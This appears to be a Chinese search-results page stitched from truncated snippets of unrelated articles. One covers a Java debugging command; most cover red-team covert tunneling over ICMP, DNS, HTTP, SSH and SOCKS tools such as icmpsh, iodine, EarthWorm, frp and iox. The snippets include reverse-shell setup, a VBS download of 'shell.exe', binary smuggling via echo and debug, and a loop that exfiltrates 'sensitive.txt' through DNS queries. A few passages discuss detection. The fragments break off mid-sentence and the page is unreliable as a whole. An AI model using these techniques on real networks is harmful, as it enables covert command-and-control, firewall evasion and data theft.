今天分享一个非常重要的命令tt,全称是TimeTunnel,记录下指定方法每次调用的入参和返回信息,并能对这些不同的时间下调用进行观测。...这个命令与之前讲到的arthas命令watch观察方法调用(上)](https://mp.weixin.qq.com/s/6fMKP7H4Q7ll_0v-wyN19g)、arthas命令watch观察方法调用...(下)从大概功能上比较相似,区别在于watch如果想发挥足够的排查作用,必需熟练掌握ognl语法,特别是高级语法这样才能从大量的请求中筛选出来自己想要的,tt命令相对简单,而且还支持录制、重放功能,可以说非常强大...在arthas运行的过程中,经过tt命令保存的方法都是可以重放的。...arthas命令tt方法时空隧道 Demo代码 package com.fun; import com.alibaba.fastjson.JSONObject; import com.fun.frame.httpclient.FanLibrary
在这篇文章中,你会了解到通过ICMP命令控制和ICMP隧道进行数据窃取的RED TEAM行动,使用这两种方法在网络中产生的畸形流量,有助于规避防火墙规则。...利用ICMP协议进行命令控制 我们发布的很多内容中都讨论了C2通道,又叫做命令控制,具体内容可以在这里找到。而在这篇文章中,你会了解到如何将ICMP协议用作命令控制通道。...然后运行以下命令: syntax: icmpsh.exe -t icmpsh.exe -t 192.168.1.108 在宿主机上执行完上述命令后,攻击者就会收到运行着受控端的机器的反弹...ICMP隧道搭建 ICMP隧道是指将TCP连接通过ICMP包进行隧道传送的一种方法。在此我们会获取一个被封装到ICMP包中的ssh会话。...通过ICMP连接SSH 到这里应该通过ICMP包建立了一个点对点隧道。服务端的隧道IP是10.0.0.1,客户端的隧道IP是10.0.0.2。
目录 前言 一、概述 1、简介 2、原理 3、使用 (1)服务端 (2)客户端 二、实践 1、场景 2、建立隧道 (1)攻击机监听 (2)目标机发送 (3)攻击机转换 3、抓包看看...源码与分析 (1)icmp_tran.py (2)tran.sh 2、检测与绕过 (1)异常ICMP数据包数量 (2)异常ICMP包长度 (3)payload内容 结语 前言 本文研究ICMP隧道的一个工具...:内网渗透系列:内网隧道之ICMP隧道 3、使用 (1)服务端 tucpdump监听并下载文件 sudo tcpdump -i eth0 icmp and icmp[icmptype]=icmp-echo...主要是这是传个文件就结束了,所以maybe可以天下武功唯快不破,视情况而定 (2)异常ICMP包长度 已经做了拆分 (3)payload内容 payload内容这个还是没办法避免的事情 正常ping命令...#$%&’()+,-./01234567 内容肯定还是与正常ping命令不同 不过send和receive的内容相同 结语 简单试下怎么传文件 版权声明:本文内容由互联网用户自发贡献,该文观点仅代表作者本人
ICMP隧道简介 ICMP是一个比较特殊的协议,在一般的通信协议里如果两台设备要进行通信,肯定需要开放端口,而在ICMP协议下就不需要,最常见的ICMP消息为ping命令的回复,攻击者可以利用命令行得到比回复更多的...但是大多数情况下允许ICMP流量,因此,可以将此协议用作隐蔽通道,以便获取shell并在目标主机上远程执行命令 ICMP隧道使用 常用的ICMP隧道工具有icmpsh、PingTunnel、icmptunnel...,可以跨平台使用,为了避免隧道被滥用,可以为隧道设置密码。...22端口时,直接修改命令即可,例如: ....使用ICMP隧道时会产生大量的ICMP数据包,我们可以通过Wireshark进行ICMP数据包分析,以检测恶意ICMP流量,具体方法如下: 检测同一来源的ICMP数据包的数量,一个正常的ping命令每秒最多发送两个数据包
内网隐藏通信隧道技术——EW隧道 EarthWorm中的应用 在研究人员的渗透测试中,EW很好用,体积小,Linux为30kb左右,windows为56kb左右。...该工具能够以“正向”、“反向”、“多级级联”等方式打通一条网络隧道,直达网络深处,现在使用人数较多,如果在真实环境下使用,需要免杀 下载地址:https://github.com/idlefire/ew...该工具共有6种命令格式(ssocksd、rcsocks、rssocks、lcx_listen、lcx_tran) -l 本地要监听的端口 -f 要主动连接的ip -g 要主动连接的端口 -d 要反弹到的...反弹 SOCKS v5 服务器 这个操作具体分两步:a) 先在一台具有公网 ip 的主机A上运行以下命令: $ ....10.10.3.100 域控:10.10.3.6 10.10.21.5 财务独立内网机器:10.10.21.2 172.16.5.2 财务核心机器:172.16.5.5 正向SOCKS v5服务器 以下命令使用目标为其拥有一个外网
启动命令: Windows:frpc.exe -c frpc.ini Linux:./frpc -c ./frpc.ini ....工具使用 「这里linux是公网VPS,作为服务端 windows是内网服务器,作为客户端」 在linux中解压命令: tar zxvf frp_0.37.0_linux_amd64.tar.gz...=fraps service After=network.target syslog.target Wants=network.target [Service] Type=simple \#启动服务的命令...local_port = 80 #本地端口(根据协议修改) remote_port = 6001 #远程服务器的ip端口 启动命令:(在目录下打开命令行) frpc.exe -c frpc.ini...首先在外网vps上启动frps服务,在内网的web服务器与域控之间建立一条frps隧道,内网web服务器启动frps,域控启动frpc服务,相互连接,建立起一条一级代理隧道,此时web服务器就作为跳板了
该隧道由中间的“代理服务器”创建,通常部署于“DMZ”区域。 在隧道中可以传输一些被限制的协议,最终借由“代理服务器”跳出受限网络。.../1.1 200告诉“客户端”隧道已经建立 “客户端”发送TCP之上(包括SSL)的数据给“代理”,再经由“代理”转发给“服务器”。...# 以下来自服务器的数据 HTTP/1.1 200 OK ... ---- 非CONNECT方法建立HTTP隧道 建立HTTP隧道可以是任何方法,它只是一种思想,而CONNECT是最为常见的方式而已...建立HTTP隧道的场景中,“客户端”部署在保护(受限)网络的内部,而“代理”则部署在外部。...---- 代理认证 这里的“代理认证“指的是”代理“对”客户端“进行身份认证,认证通过后才允许建立HTTP隧道。
网络层隧道技术之ICMP隧道(pingTunnel/IcmpTunnel) 目录 ICMP隧道 使用ICMP搭建隧道(PingTunnel) 使用ICMP搭建隧道...最常见的ping命令就是利用的ICMP协议,攻击者可以利用命令行得到比回复更多的ICMP请求。在通常情况下,每个ping命令都有相应的回复与请求。...在一些网络环境中,如果攻击者使用各类上层隧道(例如:HTTP隧道、DNS隧道、常规正/反向端口转发等)进行的操作都失败了,常常会通过ping命令访问远程计算机,尝试建立ICMP隧道,将TCP/UDP数据封装到.../icmptunnel -s #监听 重新打开一个命令行窗口 ifconfig tun0 10.0.0.1 netmask 255.255.255.0.../icmptunnel 192.168.10.20 #连接服务端 重新打开一个命令行窗口 ifconfig tun0 10.0.0.2 netmask
使用ICMP进行命令控制(Icmpsh) 目录 ICMP隧道 使用ICMP进行命令控制(Icmpsh) ICMP隧道 ICMP隧道简单实用,是一个比较特殊的协议。...最常见的ping命令就是利用的ICMP协议,攻击者可以利用命令行得到比回复更多的ICMP请求。在通常情况下,每个ping命令都有相应的回复与请求。...在一些网络环境中,如果攻击者使用各类上层隧道(例如:HTTP隧道、DNS隧道、常规正/反向端口转发等)进行的操作都失败了,常常会通过ping命令访问远程计算机,尝试建立ICMP隧道,将TCP/UDP数据封装到...使用ICMP进行命令控制(Icmpsh) 适用场景:目标机器是Windows服务器的情况 git clone https://github.com/inquisb/icmpsh.git #先下载...| 网络层隧道技术之ICMP隧道(pingTunnel/IcmpTunnel) 内网转发及隐蔽隧道 | 使用SSH做端口转发以及反向隧道 内网转发及隐蔽隧道 | 端口转发和端口映射 内网渗透 | 内网转发工具的使用
web隧道 web隧道可以让 HTTP 应用程序访问使用非 HTTP 协议的应用程序。Web 隧道允许用户通过 HTTP 连接发送非 HTTP 流量,这样就可以在 HTTP 上捎带其他协议数据了。...CONNECT方法建立HTTP隧道 Web 隧道是用 HTTP 的 CONNECT 方法建立起来的。...SSL隧道 最初开发 Web 隧道是为了通过防火墙来传输加密的 SSL 流量。很多组织都会将所有流量通过分组过滤路由器和代理服务器以隧道方式传输,以提升安全性。...隧道认证 在适当的情况下,也可以将 HTTP 的其他特性与隧道配合使用。尤其是,可以将代理的认证支持与隧道配合使用,对客户端使用隧道的权利进行认证。...隧道的安全性考虑 总的来说,隧道网关无法验证目前使用的协议是否就是它原本打算经过隧道传输的协议。因此使用隧道的时候要格外小心。 参考资料 《HTTP权威指南》
ICMP隧道小记 一般的通信协议里,如果两台设备之间需要进行通信,肯定是需要开放端口的,但是ICMP协议不需要。...如果出现下图的情况,更新一下服务器中的包即可 如果还是不可以的话,就只能用pip了 pip2 install impacket step 3 配置 因为icmpsh工具要代替系统本身的ping命令的应答程序...,所以需要输入如下命令来关闭本地系统的ICMP答应(如果要恢复系统答应,则设置为0),否则Shell的运行会不稳定。...sysctl -w net.ipv4.icmp_echo_ignore_all=1 隧道利用完记得换回来1改成0就好 step 4 Run .
其原理是:通过TAP虚拟网卡,在服务端建立一个局域网;在客户端,通过TAP建立一个虚拟网卡;两者通过DNS隧道连接,处于同一个局域网(可以通过ping命令通信)。...然后在我们的VPS上执行以下命令监听UDP53端口 tcpdump -n -i eth0 udp dst port 53 在任意一台机器上执行 nslookup test.hack.com 命令,如果在我们的...,但是启动的过程中,会遇到杀毒软件的报毒,并且需要管理员权限执行命令才可以启动 iodine.exe -f -P root@123456 test.hack.com 那我们现在就以管理员权限运行该命令...相关文章: 内网转发及隐蔽隧道 | 使用DNS进行命令控制(DNS-Shell) 内网转发及隐蔽隧道 | 使用ICMP进行命令控制(Icmpsh) 内网转发及隐蔽隧道 | ICMP隧道(pingTunnel.../IcmpTunnel) 内网转发及隐蔽隧道 | 网络层隧道技术之ICMP隧道 内网转发及隐蔽隧道 | 使用SSH做端口转发以及反向隧道 内网转发及隐蔽隧道 | 端口转发和端口映射 内网转发及隐蔽隧道
IP 隧道 Linux 原生支持多种三层隧道,其底层实现原理都是基于 tun 设备。我们可以通过命令 ip tunnel help 查看 IP 隧道的相关操作。...netns exec ns1 ip l s tun1 up ip netns exec ns1 ip a a 10.10.100.10 peer 10.10.200.10 dev tun1 上面的命令是在...NS1 上创建 tun 设备 tun1,并设置隧道模式为 ipip,然后还需要设置隧道端点,用 remote 和 local 表示,这是 隧道外层 IP,对应的还有 隧道内层 IP,用 ip addr...1、首先 ping 命令构建一个 ICMP 请求包,ICMP 包封装在 IP 包中,源目的 IP 地址分别为 tun1(10.10.100.10) 和 tun2(10.10.200.10) 的地址。...2、由于 tun1 和 tun2 不在同一网段,所以会查路由表,当通过 ip tunnel 命令建立 ipip 隧道之后,会自动生成一条路由,如下,表明去往目的地 10.10.200.10 的路由直接从
借助HHDESK的SSH隧道功能,本机却能轻松连接此服务器,并进行访问和操作。本篇便详细介绍一下实现过程。1 新建SSH连接首先点击主页的“资源管理”,选择客户端,点击新增;按配置设置好各个选项。...2 新建SSH隧道服务点击服务端,选择新增;出口主机填写公网IP,SSH通道选择适才设置的链接;入口端口填写本机端口;点击确定。
TCP代理,不支持UDP代理以及各种验证协议,socks5不仅支持TCP/UDP代理以及各种身份验证协议的同时,还会通过身份验证建立完整的TCP 连接,并使用Secure Shell (SSH) 加密隧道的方法来中继流量...,在红蓝攻防对抗中,我们经常会利用Socks5来建立通信隧道以此来访问远程核心靶标系统中的内部网络。...2.socks常见利用场景假设在目标内网中已经获取了一台可执行任意命令权限的主机后,需要对其主机所属的区域以及安全策略进行判断,探测是否可以建立socks连接,具体的socks常见利用场景描述如表1-1
---- 内网隧道之iox 前言 本文研究端口转发 & SOCKS代理工具的一个工具,iox github:https://github.com/EddieIvan01/iox 一、概述 1、简介 最后更新于.../iox proxy -l 1080 #在被控机开启Socks5服务,将服务转发到公网VPS #在VPS上转发0.0.0.0:9999到0.0.0.0:1080 #你必须将两条命令成对使用,因为它内部包含了一个简单的协议来控制回连.../iox fwd -r 127.0.0.1:80 -r *192.168.10.128:2222 -k 123456 (3)隧道建立 还可以nc、ssh等,根据端口来确定服务 (4)抓包看看.../iox proxy -r 192.168.10.128:2222 (3)隧道建立 之后通过proxychains可以执行命令 如nmap扫描端口信息 proxychains4 nmap -p 1-1000...return } netio.PipeForward(remoteConnCtx, localConnCtx) }() } } 2、检测与绕过 (1)特征字符串和特征码 命令和
ssh 的-D参数,我们可以在本地搭建一个socks5服务器,具体使用方法如下: ssh -qTNf -D 127.0.0.1:12345 test@222.333.444.555 其中-q表示该命令进入安静模式...-T是指该命令不占用shell -N是指该命令不执行远程命令 -f是指该命令在后台运行 -D是该命令重要参数,他的后面跟着socks5服务器的地址与端口 最后就是远程服务器用户名和地址...执行完该命令后,我们需要在浏览器中设置代理服务器,地址和端口就是上面提到的,然后记得选择socks5协议。...具体命令如下: ssh -N -f -L 127.0.0.1:12345:10.21.0.34:22 test@12.3..4.5 其中-N,-f作用上面已经讲了,这里最重要的是-L命令,它作用是做本地映射...,使得远程服务器的端口相当于本地某自定义的端口,如上面的命令,本地的12345端口就相当于10.21.0.34的22端口,以后我只需要使用ssh user@127.0.0.1 -p 12345命令就能登录
---- 隐藏通信隧道技术 前言 本篇继续阅读学习《内网安全攻防:渗透测试实战指南》,是第三章隐藏通信隧道技术,详细介绍了IPv6隧道、ICMP隧道、HTTPS隧道、SSH隧道、DNS隧道等加密隧道的使用方法...test.7z E:\API 将E:\test.part01.7z解压到E盘的x1目录下 7z.exe x -padmin E:\test.7z.001 -oE:\x1 七、上传和下载 1、VBS 执行下面命令即可在目标主机上下载...post.responseBody) aGet.SaveToFile "C:\test\shell.exe",2 2、Debug上传 先将需要上传的EXE文件转换为十六进制HEX的形式,再通过echo命令将...windows-binaries目录,执行 wine exe2bat.exe ew.exe ew.txt 将ew.exe转换为ew.txt 然后,利用目标服务器的Debug功能将HEX代码还原为EXE文件 再使用echo命令将...ew.txt里面的代码复制到目标系统的命令行环境中 3、其他 还可以用以下这些上传文件: Nishang:利用Nishang将上传的EXE文件转换为十六进制的形式,然后使用echo命令访问目标服务器
---- 内网隧道之spp 前言 本文研究支持多协议双向代理的一个工具,spp github:https://github.com/esrrhs/spp 一、概述 1、简介 2020年新鲜出炉,持续更新...reverse_proxy_client -server 192.168.10.128:8888 -fromaddr :2222 -toaddr :80 -proxyproto tcp 可以开启80端口的Apache看看 (3)隧道建立...test" -type reverse_socks5_client -server 192.168.10.128 -fromaddr :1080 -proxyproto tcp -proto (3)建立隧道
DNS隧道技术是如何实现的 一个查询的流程 我们通过下图来理解一下 ?...如何向外部dns发送数据 1 将下面内容保存一个文件 cat sensitive.txt Alice Bob John 2 使用如下命令 for i in $(cat sensitive.txt); do...使用的条件: 1 一台vps 2 一个域名控制权限 3 一台内网权限 利用dns回显sql注入 基于以上思路,我们在遇到没有回显的注入时,不能确定命令是否成功,我们可以利用dns,将结果回显到自己的dns...功能:检测指定磁盘下有没有该文件 命令:xp_fileexist '' master..xp_subdirs 功能:获取指定目录下的目录列表 命令:master..xp_subdirs...总结 本文简单的讲解了DNS隧道技术是如何实现的,以及简单的测试,推荐了工具,然而并没有对工具如何使用进行阐述,这就需要小伙伴们自己去测试了。
领取专属 10元无门槛券
手把手带您无忧上云
云服务器
即时通信 IM
ICP备案
对象存储
实时音视频
